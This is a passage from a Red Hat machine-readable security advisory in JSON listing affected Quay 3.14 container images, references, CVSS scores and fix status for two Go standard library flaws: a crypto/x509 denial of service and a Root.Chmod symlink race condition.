          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456333",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456333"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32281",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758061",
          "url": "https://go.dev/cl/758061"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78281",
          "url": "https://go.dev/issue/78281"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4946",
          "url": "https://pkg.go.dev/vuln/GO-2026-4946"
        }
      ],
      "release_date": "2026-04-08T01:06:58.354000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation"
    },
    {
      "cve": "CVE-2026-32282",
      "cwe": {
        "id": "CWE-367",
        "name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
      },
      "discovery_date": "2026-04-08T02:01:12.683211+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456336"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the internal/syscall/unix package in the Go standard library. If the target of the `Root.Chmod` function is replaced with a symbolic link during execution, specifically after `Root.Chmod` checks the target but before acting, the `chmod` operation will be performed on the file the symbolic link points to. This issue can bypass directory restrictions and lead to unauthorized permission changes on the filesystem.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this issue, an attacker needs access to the system and the required permissions to create a symbolic link. Additionally, the attacker must swap the target file with a symbolic link in the exact window after the `Root.Chmod` function checks its target but before acting. Due to these conditions, this flaw has been rated with a moderate severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456336",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456336"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32282",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/763761",
          "url": "https://go.dev/cl/763761"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78293",
          "url": "https://go.dev/issue/78293"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4864",
          "url": "https://pkg.go.dev/vuln/GO-2026-4864"
        }
      ],
      "release_date": "2026-04-08T01:06:55.953000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
